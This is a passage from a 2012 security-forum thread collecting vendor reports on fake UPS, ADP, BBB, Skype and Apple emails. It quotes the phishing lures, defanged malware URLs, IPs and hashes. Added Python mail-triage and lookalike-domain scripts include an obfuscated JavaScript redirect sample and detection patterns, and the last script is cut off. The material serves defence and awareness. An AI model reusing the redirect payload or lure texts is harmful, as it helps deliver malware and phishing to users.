Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #1 AplusWebMaster (Adviser Team; joined Oct 2005, USA, 6,881 posts)

    SCAM and SPAM ...

    FYI... multiple entries:

    iPad SCAM ...
    - http://www.gfi.com/blog/twitter-dm-l...-to-ipad-scam/
    Oct 24, 2012 - "We have been reading reports of malware and phishing attacks by means of suspicious direct messages to get user systems infected or have user information and credentials stolen, a ploy that is fast becoming common in the Twittersphere now more than ever. One GFI Labs blog reader gave us the heads up on the latest DM currently making rounds on Twitter. The message says:
    did you see your pics with her facebook(dot)com/45569965114786…
    Users who click the embedded link are led to a Facebook app page, which then executes a PHP script—
    > http://www.gfi.com/blog/wp-content/u...nd-traffic.png
    ... —before redirecting them to this:
    > http://www.gfi.com/blog/wp-content/u...ge-300x181.jpg
    It appears to be a genuine Facebook event page; however, the URL has made obvious that it’s not at all related to the said social networking site.
    Depending on where users are in the US and UK, they are led to either a survey scam page or a phishing page once they click - Click here.:
    > http://www.gfi.com/blog/wp-content/u...am-300x222.jpg
    ...
    > http://www.gfi.com/blog/wp-content/u...ge-300x285.png
    ... Others are redirected to this ad campaign page we’re probably familiar with:
    > http://www.gfi.com/blog/wp-content/u...ge-300x201.png
    We have determined that more than 4,500 Internet users have visited the dodgy Facebook app page; however, it is unclear how many have fallen victim to these scams... quick reminder to our readers: think before you click..."
    ___

    Contract SPAM / fidelocastroo .ru
    - http://blog.dynamoo.com/2012/10/cont...castrooru.html
    24 Oct 2012 - "This fake contact spam leads to malware on fidelocastroo .ru:
    Date: Tue, 23 Oct 2012 12:33:51 -0800
    From: "Wilburn TIMMONS" [HIWilburn@hotmail.com]
    Subject: Fw: Contract from Wilburn
    Attachments: Contract_Scan_DS23656.htm
    Hello,
    In the attached file I am transferring you the Translation of the Job Contract that I have just received today. I am really sorry for the delay.
    Best regards,
    Wilburn TIMMONS, secretary


    The .htm attachment contains obfuscated javascript that attempts to direct the visitor to a malicious [donotclick]fidelocastroo .ru:8080/forum/links/column.php. This domain name has been used in several recent attacks and is currently multihomed on some familiar IP addresses:

    202.3.245.13 (President of French Polynesia*)
    203.80.16.81 (MYREN, Malaysia)
    209.51.221.247 (eNet, US)

    * http://blog.dynamoo.com/2012/10/pres...polynesia.html ..."
    ___

    Bogus Windows License SPAM - in the Wild
    - http://www.gfi.com/blog/bogus-window...s-in-the-wild/
    Oct 24, 2012 - "... Below is a screenshot of a new spam run in the wild... presents to recipients a very suspicious but very free license for Microsoft Windows that they can download. Sounds too good to be true? It probably is.
    > http://www.gfi.com/blog/wp-content/u...22-300x124.png
    From: {random email address}
    Subject: Re: Fwd: Order N [redacted]
    Message body:
    Welcome,
    You can download your Microsoft Windows License here -
    Microsoft Corporation

    Clicking the hyperlinked text leads recipients to a number of .ru websites hosting the file, page2.htm (screenshot below), which contains obfuscated JavaScript code that loads the Web page fidelocastroo(dot)ru(colon)8080/forums/links/column(dot)php.
    > http://www.gfi.com/blog/wp-content/u...ole-300x83.png
    This spam is a launchpad for a Blackhole-Cridex attack on user systems. This method is likewise being used by the most recent campaign of the “Copies of Policies” spam*, also in the wild..."
    * http://gfisoftware.tumblr.com/tagged/Copies-of-Policies
    ___

    Wire Transfer SPAM / ponowseniks .ru
    - http://blog.dynamoo.com/2012/10/wire...wseniksru.html
    24 Oct 2012 - "This fake wire transfer spam leads to malware on ponowseniks .ru:
    Date: Wed, 24 Oct 2012 04:26:12 -0500
    From: FedEx [info@emails.fedex.com]
    Subject: Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 9649AA02)
    Attachments: Report_Trans99252.htm
    Dear Bank Operator,
    WIRE TRANSFER: FEDW-30126495944197210
    STATUS: REJECTED
    You can find details in the attached file.
    (Internet Explorer format)

    The .htm attachment attempts to redirect the user to a malicious page at [donotclick]ponowseniks .ru:8080/forum/links/column.php hosted on some familiar IP addresses:
    202.3.245.13 (President of French Polynesia)
    203.80.16.81 (MYREN, Malaysia)
    209.51.221.247 (eNet, US)"
    ___

    BBB SPAM / samplersmagnifyingglass .net
    - http://blog.dynamoo.com/2012/10/bbb-...gglassnet.html
    24 Oct 2012 - "This fake BBB spam leads to malware on samplersmagnifyingglass .net:
    Date: Wed, 24 Oct 2012 22:10:18 +0430
    From: "Better Business Bureau" [noreply@bbb.org]
    Subject: Better Business Beareau Appeal #42790699
    Attention: Owner/Manager
    Here with the Better Business Bureau notifies you that we have been sent a claim (ID 42790699) from one of your consumers about their dealership with you.
    Please view the CLAIMS REPORT down to view more information on this problem and suggest us about your point of view as soon as possible.
    On a website above please enter your complain id: 42790699 to review it.
    We are looking forward to hearing from you.
    -----------------------------------
    Faithfully,
    Rebecca Wilcox
    Dispute advisor
    Better Business Bureau


    The malicious payload is on [donotclick]samplersmagnifyingglass .net/detects/confirming_absence_listing.php hosted on 183.81.133.121, a familiar IP address belonging to Vodafone in Fiji that has been used several times before and is well worth blocking."

    Last edited by AplusWebMaster; 2012-10-24 at 22:46.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #2 AplusWebMaster (Adviser Team)

    Fake UPS, Facebook, ADP emails lead to malware ...

    FYI... multiple entries:

    Fake UPS emails serve malware ...
    - http://blog.webroot.com/2012/10/25/y...serve-malware/
    Oct 25, 2012 - "... cybercriminals launched yet another massive spam campaign, impersonating the United Parcel Service (UPS), in an attempt to trick its current and prospective customers into downloading and executing the malicious attachment found in the email. Upon execution, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete control over the victim’s host...
    Screenshot of the spamvertised email:
    > https://webrootblog.files.wordpress....il_malware.png
    Detection rate for the malicious attachment: MD5: 0e78d3704332c59b619f872fd6d33d25 * ... Trojan-Downloader.Win32.Andromeda.qw.
    * https://www.virustotal.com/file/d9e1...is/1350581761/
    File name: UPS_Delivery_Confirmation.pdf.exe
    Detection ratio: 32/43
    Analysis date: 2012-10-18
    ___

    Fake Facebook emails lead to malware
    - https://www.net-security.org/malware_news.php?id=2302
    25.10.2012 - "If you receive an email seemingly sent by Facebook, sharing an offensive comment that has seemingly been left on your Wall by an unknown user, please don't be tempted to follow the link.
    > https://www.net-security.org/images/...nsive-scam.jpg
    ... If you do, you'll be -redirected- to a -fake- Facebook page hosting a malicious iFrame script that triggers the infamous Blackhole exploit kit, and if it finds a vulnerability to exploit, you will be automatically saddled with some or other malicious software. The attackers will try to hide the fact by automatically redirecting you to another legitimate Facebook page, belonging to a Facebook user that, according to Sophos*, does not seem to be related to the attack."
    * http://nakedsecurity.sophos.com/2012...alware-attack/
    ___

    ADP SPAM / openpolygons .net
    - http://blog.dynamoo.com/2012/10/adp-...lygonsnet.html
    25 Oct 2012 - "This fake ADP spam leads to malware on openpolygons .net:
    From: warning @adp .com
    Sent: Thu 25/10/2012 16:42
    Subject: ADP Instant Message
    ADP Pressing Communication
    Reference No.: 27711
    Respected ADP Client October, 25 2012
    Your Transaction Report(s) have been uploaded to the web site:
    Click Here to access
    Please overview the following information:
    Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
    Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
    This email was sent to existing users in your company that access ADP Netsecure.
    As general, thank you for using ADP as your business affiliate!
    Ref: 27711

    > https://lh3.ggpht.com/-xEHpgbIAYcs/U...0/adp-spam.png

    The malicious payload is at [donotclick]openpolygons .net/detects/lorrys_implication.php hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden) which is an IP address that has been seen before. That IP also hosts the fake AV application win8ss .com and another malware site of legacywins .com...
    ..."
    ___

    "End of Aug. Statement required" SPAM / kiladopje .ru
    - http://blog.dynamoo.com/2012/10/end-...ired-spam.html
    25 Oct 2012 - "This spam leads to malware on kiladopje .ru:
    From: ZaireLomay @mail .com
    Sent: 24 October 2012 20:58
    Subject: Re: FW: End of Aug. Statement required
    Hi,
    as reqeusted I give you inovices issued to you per sept. (Internet Explorer format)
    Regards


    In this case, there's an attachment called Invoices-23-2012.htm with some obfuscated Javascript to direct visitors to a malware laden page at [donotclick]kiladopje .ru:8080/forum/links/column.php hosted on:
    79.98.27.9 (Interneto Vizija, Lithuania)
    203.80.16.81 (MYREN, Malaysia)
    209.51.221.247 (eNet, US)
    The following IPs and domains are all related and should be blocked if you can:
    ..."
    ___

    Vast email -malware- outbreaks – efaxCorporate and Xerox copiers
    - http://blog.commtouch.com/cafe/email...xerox-copiers/
    Oct 25, 2012 - "... huge amounts of email-attached malware distributed – all with an “office” theme. The attacks pushed the amount of email up by several hundred percent and totaled near five billion emails sent worldwide.
    > http://blog.commtouch.com/cafe/wp-co...4-Oct-2012.jpg
    The first part of the day saw emails describing an attachment as being the scan from a Xerox Workcenter... Yesterday’s file was a zipped executable. The second part of the attack moved on to eFaxCorporate, announcing the arrival of a (21 page) fax message. Once again the attachment was an executable file pretending to be a PDF. The file is detected as W32/Trojan2.NTLB... The malware scans the infected system for FTP programs – no doubt looking for FTP credentials that can be stolen to access and compromise Web servers (which can then be used to serve malware links).
    > http://blog.commtouch.com/cafe/wp-co...ax-message.jpg ..."

    Last edited by AplusWebMaster; 2012-10-26 at 01:45.
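    The .htm attachments with obfuscated JavaScript, the shared :8080/forum/links/column.php landing path and the .pdf.exe double extensions described in posts #1 and #2 above can be caught with simple mail triage. The following is an added example, not code from Dynamoo, GFI or Webroot: it builds constructed messages with the standard email library and scans them; the host redirector.example.invalid and the sender addresses are placeholders.

```python
"""Mail triage for the lures quoted in the posts above: .htm attachments whose obfuscated
script redirects to the shared :8080/forum/links/column.php path, document-looking names
ending in .exe, and the 'Internet Explorer format' nudge. Added example, not code from
any of the linked blogs; the sample messages and hostnames are constructed."""
import email
import re
from email import policy
from email.message import EmailMessage

# Landing path shared by the fidelocastroo/ponowseniks/kiladopje .ru campaigns quoted above
CAMPAIGN_URL = re.compile(r"https?://[^\s'\"<>]+:8080/forum/links/column\.php", re.I)
# A document extension immediately followed by an executable one (UPS_Delivery_Confirmation.pdf.exe)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png|txt)\.(exe|scr|com|pif|bat|js)$", re.I)
BROWSER_EXT = (".htm", ".html")
SCRIPT_RE = re.compile(r"<script\b", re.I)
OBFUSCATION_RE = re.compile(r"\b(eval|unescape|fromCharCode|document\.write)\b")
# Wording that pushes the recipient to open the attachment in a browser
LURE_PHRASES = ("internet explorer format", "open with internet explorer")


def _as_text(part) -> str:
    """Return an attachment's decoded content as text, whatever the transfer encoding."""
    content = part.get_content()
    if isinstance(content, bytes):
        return content.decode("latin-1", errors="replace")
    return content


def triage(raw: bytes) -> list:
    """Return human-readable findings for one raw RFC 5322 message; [] means nothing matched."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []

    body = msg.get_body(preferencelist=("plain", "html"))
    body_text = body.get_content().lower() if body is not None else ""
    for phrase in LURE_PHRASES:
        if phrase in body_text:
            findings.append(f"body: lure phrase '{phrase}'")

    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        lower = name.lower()
        if DOUBLE_EXT.search(lower):
            findings.append(f"attachment '{name}': document extension hides an executable")
        if lower.endswith(BROWSER_EXT):
            text = _as_text(part)
            if SCRIPT_RE.search(text):
                findings.append(f"attachment '{name}': .htm attachment carries script")
            primitives = sorted({m.group(1) for m in OBFUSCATION_RE.finditer(text)})
            if primitives:
                findings.append(f"attachment '{name}': obfuscation primitives {', '.join(primitives)}")
            for url in CAMPAIGN_URL.findall(text):
                findings.append(f"attachment '{name}': redirect to campaign path {url}")
    return findings


def build_sample(subject: str, body: str, filename: str, payload, subtype: str) -> bytes:
    """Assemble a constructed test message; payload is str (text/*) or bytes (application/*)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"      # constructed addresses, not real senders
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = subject
    msg.set_content(body)
    if isinstance(payload, bytes):
        msg.add_attachment(payload, maintype="application", subtype=subtype, filename=filename)
    else:
        msg.add_attachment(payload, subtype=subtype, filename=filename)
    return msg.as_bytes()


# Constructed stand-in for the Invoices-*.htm / Contract_Scan_*.htm attachments: the
# location assignment is hidden behind unescape()/eval(); the host is a placeholder.
HTM_PAYLOAD = (
    "<html><body><script>"
    "var s = unescape('%6C%6F%63%61%74%69%6F%6E'); "
    "eval('document.' + s + '.href=\"http://redirector.example.invalid:8080/forum/links/column.php\"');"
    "</script></body></html>"
)
SAMPLE_HTM = build_sample(
    "Re: FW: End of Aug. Statement required",
    "Hi,\nas requested I give you the invoices issued to you (Internet Explorer format)\nRegards",
    "Invoices-23-2012.htm", HTM_PAYLOAD, "html")
SAMPLE_EXE = build_sample(
    "UPS Delivery Confirmation", "Please see the attached delivery confirmation.",
    "UPS_Delivery_Confirmation.pdf.exe", b"MZ\x90\x00constructed-stub-not-a-real-binary", "octet-stream")
SAMPLE_CLEAN = build_sample(
    "Team meeting agenda", "Agenda for Thursday attached.",
    "agenda.txt", "1. Status\n2. Planning\n", "plain")

if __name__ == "__main__":
    for label, sample in (("htm", SAMPLE_HTM), ("exe", SAMPLE_EXE), ("clean", SAMPLE_CLEAN)):
        print(label, triage(sample) or ["no findings"])
```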

  3. #3 AplusWebMaster (Adviser Team)

    Bogus Skype, ADP emails lead to malware ...

    FYI... multiple entries:

    Share of malicious email by country
    - http://www.h-online.com/security/new...ew=zoom;zoom=1
    26 Oct 2012
    ___

    Bogus Skype emails lead to malware...
    - http://blog.webroot.com/2012/10/26/b...ad-to-malware/
    Oct 26, 2012 - "... millions of emails impersonating Skype, in an attempt to trick Skype users that their password has been successfully changed, and that in order to view their call history and change their account settings, they would need to execute the malicious attachment found in the emails...
    Screenshot of the spamvertised email:
    > https://webrootblog.files.wordpress....am_malware.png
    Detection rate for the malicious attachment: MD5: 0e78d3704332c59b619f872fd6d33d25 * ... Trojan-Downloader.Win32.Andromeda.qw. Upon execution, the malware opens a backdoor allowing the cybercriminals behind the campaign complete access to the affected user’s host..."
    * https://www.virustotal.com/file/d9e1...is/1350584221/
    File name: Skype_Password_inscturtions.pdf.exe
    Detection ratio: 32/43
    Analysis date: 2012-10-18
    ___

    apl.de.ap SPAM
    - http://blog.dynamoo.com/2012/10/apldeap-spam.html
    26 Oct 2012 - "I'm not really a fan of the Black Eyed Peas, so I'd never heard of apl.de.ap ( http://en.wikipedia.org/wiki/Apl.de.ap ) until I received this spam. I'm pretty sure that Mr ap isn't sending these out himself, but they're coming from a spammer in the UAE, a place which seems to be the spam capital of the middle east. Although those look like tinyurl links, they're not... they go through a redirector at ykadl .net on 109.236.88.71, the same IP used to send the spam... here's the spam in case you really want to buy tickets from a shady bunch of spammers (NOT)...
    From: DNA alex @ ykadl .net
    Date: 26 October 2012 04:48
    Subject: Black Eyed Peas/ APL DE AP in Dubai
    Signed by: ykadl.net
    BLACK EYE PEAS founding member APL DE AP heads to Dubai
    BLACK EYE PEAS founding member APL DE AP to Dubai for the first time.The internationally famed Black Eyed Peas rapper/DJ, who has won 7 Grammy Awards and sold over 70 million albums, will be the headliner performance at Nasimi Beach on Thursday 1st November.
    Like his high school friend Will I Am, APL DE AP also DJ's with international bookings all around the globe including Ibiza, Cannes and London, recently headlining at Belgium's Tomorrowland Festival. The American-Philippines star headlines this event with support from Dion Mavath, local celebrity DJ Marwan Bliss/ 411, Mathew Charles and as well as a performance by Number One selling band Swickasswans.
    APL DE AP and the other members of the Black Eyed Peas have been on a hiatus
    ..."
    ___

    ADP SPAM / steamedboasting .info
    - http://blog.dynamoo.com/2012/10/adp-...stinginfo.html
    26 Oct 2012 - "This fake ADP spam leads to malware on steamedboasting.info:
    From: ClientService @adp .com
    Sent: 26 October 2012 12:03
    Subject: ADP Instant Notification
    ADP Urgent Warning
    Reference #: 31344
    Dear ADP Client October, 25 2012
    Your Transfer Summary(s) have been uploaded to the web site:
    https ://www.flexdirect.adp .com/client/login.aspx
    Please take a look at the following information:
    • Please note that your bank account will be charged within 1 banking day for the amount(s) specified on the Statement(s).
    • Please DO NOT reply to this message. automative notification system cannot accept incoming messages. Please Contact your ADP Benefits Specialist.
    This note was sent to existing users in your company that approach ADP Netsecure.
    As always, thank you for choosing ADP as your business companion!
    Ref: 31344


    The malicious payload is at [donotclick]steamedboasting .info/detects/burying_releases-degree.php, the initial redirection page has some Cloudflare elements on it which is a bit disturbing. steamedboasting .info is hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden).
    This is an alternative variant with the same malicious payload:
    Date: Fri, 26 Oct 2012 16:32:10 +0530
    From: "noreply @adp .com"
    Subject: ADP Prompt Communication
    ADP Speedy Notification
    Reference #: 27585
    Dear ADP Client October, 25 2012
    Your Transaction Statement(s) have been put onto the web site:
    Web site link
    Please see the following notes:
    • Please note that your bank account will be charged-off within 1 banking business day for the amount(s) specified on the Protocol(s).
    • Please do not reply to this message. automative notification system can't accept incoming mail. Please Contact your ADP Benefits Specialist.
    This message was sent to operating users in your company that approach ADP Netsecure.
    As always, thank you for choosing ADP as your business partner!
    Ref: 27585 [redacted]
    ..."
    ___

    "Your Photos" SPAM / manekenppa .ru
    - http://blog.dynamoo.com/2012/10/your...ekenpparu.html
    26 Oct 2012 - "This fake "photos" spam leads to malware on manekenppa .ru:
    From: Acacia @redacted .com
    Sent: 26 October 2012 10:14
    Subject: Your Photos
    Hi,
    I have attached your photos to the mail
    (Open with Internet Explorer).

    In this case there is an attachment called Image_DIG691233.htm that leads to a malware laden page at [donotclick]manekenppa .ru:8080/forum/links/column.php hosted on some familiar looking IPs:
    79.98.27.9 (Interneto Vizija, Lithuania)
    203.80.16.81 (MYREN, Malaysia)
    209.51.221.247 (eNet, US)
    We've seen these IPs before and they are well worth blocking."

    Last edited by AplusWebMaster; 2012-10-26 at 23:10.

  4. #4 AplusWebMaster (Adviser Team)

    Fake BT-Business, Verizon emails lead to malware

    FYI...

    Fake BT-Business emails lead to malware ...
    - http://blog.webroot.com/2012/10/28/s...ad-to-malware/
    Oct 28, 2012 - "Over the past 24 hours, cybercriminals have been spamvertising millions of emails targeting customers of BT’s Business Direct in an attempt to trick its users into executing the malicious attachment found in the emails. Upon executing it, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete access to the affected host...
    Screenshot of the spamvertised email:
    > https://webrootblog.files.wordpress....il_malware.png
    Detection rate for the malicious attachment: MD5: 8d0e220ce56ebd5a03c389bedd116ac5 * ... Trojan-Ransom.Win32.Gimemo.ashm ..."
    * https://www.virustotal.com/file/8f42...7c48/analysis/
    File name: 8D0E220CE56EBD5A03C389BEDD116AC5.fil
    Detection ratio: 32/42
    Analysis date: 2012-10-25
    ___

    Fake Verizon Wireless emails serve client-side exploits and malware ...
    - http://blog.webroot.com/2012/10/27/c...s-and-malware/
    Oct 27, 2012 - "... For over a week now, cybercriminals have been persistently spamvertising millions of emails impersonating the company, in an attempt to trick current and prospective customers into clicking on the client-side exploits and malware serving links found in the malicious email. Upon clicking on any of the links, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
    Screenshot of the spamvertised email:
    > https://webrootblog.files.wordpress....ts_malware.png
    Spamvertised malicious URLs:
    hxxp ://coaseguros .com/components/com_ag_google_analytics2/notifiedvzn.html;
    hxxp ://clinflows .com/components/com_ag_google_analytics2/vznnotifycheck.html
    Client-side exploits serving URL: hxxp ://strangernaturallanguage .net/detects/notification-status_login.php?mzuilm=073707340a&awi=45&dawn=04083703023407370609&iwnjdt=0a000300040002
    Sample client-side exploits served: CVE-2010-0188
    Upon successful client-side exploitation, the campaign drops MD5: b8d6532dd17c3c6f91de5cc13266f374 * ... Trojan-Spy.Win32.Zbot.fkth
    Once executed, the sample phones back to tuningmurcelagoglamour .ru, tuningfordmustangxtremee .ru - 146.185.220.28, AS58014 ..."
    * https://www.virustotal.com/file/2d17...61f4/analysis/
    File name: b8d6532dd17c3c6f91de5cc13266f374.malware
    Detection ratio: 26/44
    Analysis date: 2012-10-09 ..."


  5. #5 AplusWebMaster (Adviser Team)

    Fake British Airways emails serve malware

    FYI...

    Fake British Airways emails serve malware
    - http://blog.webroot.com/2012/10/29/c...serve-malware/
    Oct 29, 2012 - "Cybercriminals are currently mass mailing millions of emails in an attempt to trick British Airways customers into executing the malicious attachment found in the spamvertised emails. Upon execution, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete control over the infected host...
    Screenshot of the spamvertised email:
    > https://webrootblog.files.wordpress....il_malware.png
    Detection rate for the malicious attachment: MD5: 4a3a345c24fda6987bbe5411269e26b7 * ... Trojan-Downloader.Win32.Andromeda.aey..."
    * https://www.virustotal.com/file/39f5...5c21/analysis/
    File name: BritishAirways-eticket.pdf.exe
    Detection ratio: 30/43
    Analysis date: 2012-10-23
    ___

    .com malware pretends to be naughty .com website
    - http://blog.commtouch.com/cafe/email...y-com-website/
    Oct 28, 2012 - "... The email doesn’t include much text – simply asking that you 'Pay attention at the attach':
    Screenshot: http://blog.commtouch.com/cafe/wp-co...ck-blurred.jpg
    ... As shown in the screenshot it’s www .——-face .com. Those tempted to double-click the “link” in order to visit a porn site would find themselves attacked by malware."

    Last edited by AplusWebMaster; 2012-10-29 at 14:53.

  6. #6 AplusWebMaster (Adviser Team)

    Bogus Facebook notifications serve malware

    FYI...

    Bogus Facebook notifications serve malware
    - http://blog.webroot.com/2012/10/30/c...serve-malware/
    Oct 30, 2012 - "... cybercriminals spamvertised yet another massive email campaign, impersonating the world’s most popular social network – Facebook. It was similar to a previously profiled spam campaign imitating Facebook. However, in this case the cybercriminals behind it relied on attached malicious archives, compared to including exploits and malware serving links in the email...
    Sample screenshot of the spamvertised email:
    > https://webrootblog.files.wordpress....il_malware.png
    Detection rate for the malicious archive: MD5: 0938302fbf8f7db161e46c558660ae0b * ... Trojan.Generic.KDV.753880; Trojan-Ransom.Win32.Gimemo.arsu. Upon execution, the sample opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain full access to the affected host..."
    * https://www.virustotal.com/file/79f9...is/1350575670/
    File name: FacebookPhoto_album.jpeg.exe
    Detection ratio: 34/43
    Analysis date: 2012-10-18
    ___

    Blackhat SEO poisoning: Halloween tricks and holiday malware ...
    - http://blogs.computerworld.com/cyber...ware-interview
    Oct 29, 2012 - "... things like blackhat SEO poisoning to successfully infect devices. Blackhat SEO link poisoning, scams, tricks. Although the poisonous pranks and tainted tricks go far beyond Halloween, this seemed a great time to get insight into these trends as well as tips to avoid them. You might know about it, but how about your parents or other people who are not nearly so security-savvy? You might want to warn them that their simple searches could infect their computers... especially if you will be the one called upon to fix them for free ;-) ..."
    (More detail at the URL above.)

    Last edited by AplusWebMaster; 2012-10-30 at 22:27.

  7. #7 AplusWebMaster (Adviser Team)

    Twitter, Steam phish ...

    FYI... multiple entries:

    Twitter phish is selling drama
    - http://www.gfi.com/blog/new-twitter-...selling-drama/
    Oct 30, 2012 - "... new phish in Twitter... you won’t miss it once you visit your direct message (DM) inbox. The message content can be any of the following:
    - A horrible rumor is spreading about you
    - A nasty rumor is spreading about you
    - A terrible rumor is spreading about you
    - You see this video of someone taping you? [URL redacted] creep
    - Hey you hear about the gossip your mentioned in? it started some serious drama, it fired up a lot of people on [URL redacted] sNqp


    Whatever the message, it carries a shortened URL that directs the recipient to the domain ivtwtter(dot)com once clicked. Fortunately, the domain is no longer active.
    > http://www.gfi.com/blog/wp-content/u...tter-phish.png
    Web browsers have also flagged the URL as a phishing site. If you receive any of these messages (or similar), the best way to handle it is to simply delete it from your DM inbox and warn your followers. In warning them, don’t copy and paste the entire message you received with the live link still in it — as some are prone to do — because this just increases the possibility of the nefarious link getting clicked..."
    ___

    "Your Apple ID has been disabled" phish
    - http://blog.dynamoo.com/2012/10/your...led-phish.html
    31 Oct 2012 - "I've never seen one quite like this before, although it's not the first time I've seen Apple-themed scam emails...
    From: Apple no_reply @ macapple .com
    Reply-To: no_reply @ macapple .com
    Date: 31 October 2012 06:08
    Subject: Your Apple ID has been disabled
    Apple ID Support
    Dear [redacted] ,
    This Apple ID has been disabled!
    For your protection, your Apple ID ([redacted]) is automatically disabled. We detect unauthorized Login Attempts to your Apple ID from other IP Location. Please verify your identity today or your account will be disabled due to concerns we have for the safety and integrity of the Apple Community.
    To verify your Apple ID, we recommend that you go to:
    Verify Now >


    The phish is hosted at [donotclick]app.apple .com.proiectmaxim .ro/id2/sign_in/login_ID&=/?&=?reactivate=[redacted] and it looks pretty convincing if you haven't spotted the Romanian domain name... It just goes to show that the bad guys will try to phish -anything- these days."
    ___

    HP ScanJet SPAM / donkihotik .ru
    - http://blog.dynamoo.com/2012/10/hp-s...kihotikru.html
    31 Oct 2012 - "This fake printer message leads to malware on donkihotik .ru:
    Date: Wed, 31 Oct 2012 05:06:42 +0300
    From: LinkedIn Connections
    Subject: Re: Fwd:Scan from a HP ScanJet #26531
    Attachments: HP-Scan-44974.htm
    Attached document was scanned and sent
    to you using a Hewlett-Packard Officejet PRO.
    Sent: by Bria
    Image(s) : 6
    Attachment: Internet Explorer file [.htm]
    Hewlett-Packard Officejet Location: machine location not set


    The malicious payload is at [donotclick]donkihotik .ru:8080/forum/links/column.php which is hosted on the same IP addresses as this attack* yesterday."
    * http://blog.dynamoo.com/2012/10/crai...ionadixru.html
    "... some familiar IPs:
    68.67.42.41 (Fibrenoire, Canada)
    203.80.16.81 (MYREN, Malaysia)
    209.51.221.247 (eNET, United States)
    Additional name server IPs:
    50.22.102.132 (Softlayer, United States)
    62.76.186.190 (Clodo-Cloud, Russia)
    84.22.100.108 (Cyberbunker, Netherlands)
    213.251.171.30 (OVH, France)
    ..."
    ___

    Steam phish steals more than credentials
    - http://www.gfi.com/blog/new-phish-st...m-credentials/
    Oct 31, 2012 - "... targeting players of the popular gaming platform, Steam. More than a year ago, Valve launched Steam Trading. The objective is to “allows you [the Steam account owner] to exchange In-game items and Gifts with everybody in the Steam Community.” It is a good move to get people within their large gaming community to engage with one another and form a bond of camaraderie. Upon its launch, Steam can only cater to a number of gamers. In particular, those who play Team Fortress 2, Portal, Spiral Knights, and other games from Three Rings and SEGA... phishing page that mimics the look and feel of the actual news page announcing the launch. The -bogus- page -baits- unknowing users with one free game this “Steam Happy Day”... at this time of writing Chrome flags the site as a phish... If you play Team Fortress 2, Portal, Spiral Knights plus other SEGA games on Steam and regularly trade items with other players, please avoid and block days(dot)steamgamesgift(dot)yzi(dot)me ... Be wary of free games and offers that would cost you more than you want to bargain for, especially if they’re hosted on dubious sites that use familiar strings in URLs you’d normally see in legitimate sites. To be safe, visit Steam directly* to double-check if they indeed have free offers..."
    * http://store.steampowered.com/

    Last edited by AplusWebMaster; 2012-10-31 at 19:09.
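    The Apple ID phish at app.apple .com.proiectmaxim .ro, its macapple .com sender and the Steam phish at days(dot)steamgamesgift(dot)yzi(dot)me all place a brand name somewhere other than the registrable domain. The following is an added example, not code from Dynamoo or GFI: a lookalike-host check that undoes the defanging used in these posts, extracts the registrable domain and reports why a host looks like brand impersonation; the brand list, keyword list and public-suffix table are illustrative assumptions.

```python
"""Lookalike-host check for the phishing hosts quoted in the posts above
(app.apple.com.proiectmaxim.ro, macapple.com, days.steamgamesgift.yzi.me).
Added example, not code from the linked blogs; the brand list and the suffix
table are small illustrative assumptions, not a complete database."""
import re
from urllib.parse import urlparse

# Registrable domains the brands actually own (illustrative, incomplete).
BRAND_DOMAINS = {"apple.com", "steampowered.com", "adp.com", "twitter.com", "facebook.com"}
# Brand words that attackers fuse into labels; kept to 5+ characters because short ones
# ("adp") occur inside ordinary words and would flood the check with false positives.
BRAND_KEYWORDS = {"apple", "steam", "twitter", "facebook"}
# Two-label public suffixes; a production check would load the full Public Suffix List.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp"}


def host_from(target: str) -> str:
    """Lowercase hostname from a URL, e-mail address or bare host, undoing the
    defanging used in the quoted posts ('hxxp ://', 'apple .com', '(dot)')."""
    t = target.strip().lower()
    t = re.sub(r"^hxxp", "http", t)
    t = re.sub(r"\s*://\s*", "://", t)
    t = re.sub(r"\s*\(dot\)\s*|\s+\.\s*", ".", t)
    if "://" in t:
        host = urlparse(t).hostname or ""
    elif "@" in t:
        host = t.rsplit("@", 1)[1].strip()
    else:
        host = t.split("/", 1)[0].strip()
    return host.rstrip(".")


def registrable_domain(host: str) -> str:
    """The part of the host the attacker had to register, e.g. proiectmaxim.ro."""
    labels = host.split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def classify(target: str) -> dict:
    """Explain why a host looks like brand impersonation; an empty 'reasons' list
    means the registrable domain is the brand's own or no brand reference was found."""
    host = host_from(target)
    labels = host.split(".")
    reg = registrable_domain(host)
    result = {"host": host, "registrable_domain": reg, "reasons": []}
    if reg in BRAND_DOMAINS:
        return result
    covered = set()
    # 1. A genuine brand domain stacked as subdomain labels: app.apple.com.<attacker>.ro
    for brand in sorted(BRAND_DOMAINS):
        b = brand.split(".")
        for i in range(len(labels) - len(b) + 1):
            if labels[i:i + len(b)] == b:
                result["reasons"].append(f"embeds {brand} as subdomain labels under {reg}")
                covered.update(range(i, i + len(b)))
    # 2. A brand word fused into a label: macapple.com, steamgamesgift.yzi.me
    for i, label in enumerate(labels):
        if i in covered:
            continue
        for kw in sorted(BRAND_KEYWORDS):
            if kw in label:
                result["reasons"].append(f"label '{label}' contains brand keyword '{kw}'")
    return result


def is_lookalike(target: str) -> bool:
    return bool(classify(target)["reasons"])


if __name__ == "__main__":
    for t in ("app.apple .com.proiectmaxim .ro/id2/sign_in/", "no_reply @ macapple .com",
              "days(dot)steamgamesgift(dot)yzi(dot)me", "http://store.steampowered.com/",
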